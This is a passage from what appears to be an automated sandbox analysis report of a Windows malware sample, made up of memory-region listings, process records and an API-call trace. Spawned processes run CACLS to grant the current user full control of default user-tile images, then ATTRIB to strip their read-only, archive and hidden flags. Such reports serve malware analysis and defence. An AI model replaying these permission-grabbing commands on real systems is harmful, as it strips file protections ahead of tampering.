= 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25716 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25717 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25718 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25719 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25720 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25721 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 499 os_tid = 0xcc8 Thread: id = 500 os_tid = 0xd24 Process: id = "348" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16a80" os_pid = "0xd20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "346" os_parent_pid = "0xcb0" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" 
os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25722 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25723 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25724 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25725 start_va = 0x190000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 25726 start_va = 0x9f0000 end_va = 0x9f6fff entry_point = 0x9f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 25727 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25728 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25729 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25730 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd9000" filename = "" Region: id = 25731 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25732 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25733 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25734 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25735 start_va = 0x310000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 25736 start_va = 0x570000 end_va = 0x57ffff entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 25737 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 25738 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25739 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 25740 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25741 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 
0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25742 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 25743 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25744 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25745 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25746 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 25747 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25748 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25749 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25750 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = 
"\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25751 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 501 os_tid = 0xc78 Process: id = "349" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0xc54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 25752 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 25753 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 25754 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 25755 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 25756 start_va = 0x4a9c0000 end_va = 0x4aa0bfff 
entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 25757 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 25758 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 25759 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 25760 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 25761 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 25762 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 25763 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 25764 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 25765 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 25766 start_va = 0x390000 end_va = 0x48ffff entry_point = 0x0 region_type = private name = "private_0x0000000000390000" filename = "" Region: id = 25767 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 
region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 25768 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 25769 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 25770 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 25771 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 25772 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 25773 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 25774 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 25775 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 25776 start_va = 0x490000 end_va = 0x557fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 25777 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 25778 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 25779 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 25780 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 25781 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 25782 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 25783 start_va = 0x560000 end_va = 0x660fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 25784 start_va = 0x670000 end_va = 0x126ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000670000" filename = "" Region: id = 25785 start_va = 0x1270000 end_va = 0x13d2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001270000" filename = "" Region: id = 25786 start_va = 0x13e0000 end_va = 0x16aefff entry_point = 0x13e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 502 os_tid = 0xa20 [0182.550] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe44 | out: 
lpSystemTimeAsFileTime=0x24fe44*(dwLowDateTime=0xa1b688a0, dwHighDateTime=0x1d440a9)) [0182.550] GetCurrentProcessId () returned 0xc54 [0182.550] GetCurrentThreadId () returned 0xa20 [0182.550] GetTickCount () returned 0x3450a [0182.550] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe3c | out: lpPerformanceCount=0x24fe3c*=23933937536) returned 1 [0182.551] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0182.551] __set_app_type (_Type=0x1) [0182.551] __p__fmode () returned 0x76b331f4 [0182.551] __p__commode () returned 0x76b331fc [0182.551] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0182.551] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0182.551] GetCurrentThreadId () returned 0xa20 [0182.551] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xa20) returned 0x38 [0182.551] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0182.552] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0182.552] SetThreadUILanguage (LangId=0x0) returned 0x409 [0182.552] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0182.552] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fdd4 | out: phkResult=0x24fdd4*=0x0) returned 0x2 [0182.552] VirtualQuery (in: lpAddress=0x24fe0b, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0182.552] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fda4, dwLength=0x1c | out: lpBuffer=0x24fda4*(BaseAddress=0x250000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x90000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0182.552] GetConsoleOutputCP () returned 0x1b5 [0182.552] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0182.552] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0182.552] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.552] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0182.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.553] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0182.553] _get_osfhandle (_FileHandle=1) returned 0x7 [0182.553] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0182.553] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.553] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0182.553] _get_osfhandle (_FileHandle=0) returned 0x3 [0182.553] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0182.553] GetEnvironmentStringsW () returned 0x3a0308* [0182.554] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 [0182.554] GetEnvironmentStringsW () returned 0x3a0308* [0182.554] FreeEnvironmentStringsW (penv=0x3a0308) returned 1 
[0182.554] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed44 | out: phkResult=0x24ed44*=0x40) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0xb8, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x0, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegCloseKey (hKey=0x40) returned 0x0 [0182.554] RegOpenKeyExW (in: hKey=0x80000001, 
lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed44 | out: phkResult=0x24ed44*=0x40) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x40, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x1, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.554] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x0, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.555] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x9, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.555] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x4, lpData=0x24ed50*=0x9, lpcbData=0x24ed48*=0x4) returned 0x0 [0182.555] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed4c, lpData=0x24ed50, lpcbData=0x24ed48*=0x1000 | out: lpType=0x24ed4c*=0x0, lpData=0x24ed50*=0x9, lpcbData=0x24ed48*=0x1000) returned 0x2 [0182.555] RegCloseKey (hKey=0x40) returned 0x0 [0182.555] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886390 [0182.555] srand (_Seed=0x5b886390) [0182.555] 
GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" [0182.555] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"" [0182.555] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.555] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3a1a68, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0182.555] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0182.556] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0182.556] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.556] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0182.556] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0182.556] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0182.556] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0182.556] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0182.556] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0182.556] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0182.556] 
_wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0182.556] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0182.556] GetEnvironmentStringsW () returned 0x3a2458* [0182.556] FreeEnvironmentStringsW (penv=0x3a2458) returned 1 [0182.556] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0182.556] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0182.556] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0182.556] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0182.556] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0182.556] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0182.556] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0182.556] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0182.556] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0182.556] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0182.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb10 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0182.556] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb10, lpFilePart=0x24fb0c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb0c*="Desktop") returned 0x18 [0182.557] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0182.557] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f88c | out: lpFindFileData=0x24f88c) returned 0x3a0ae8 [0182.557] FindClose (in: hFindFile=0x3a0ae8 | out: 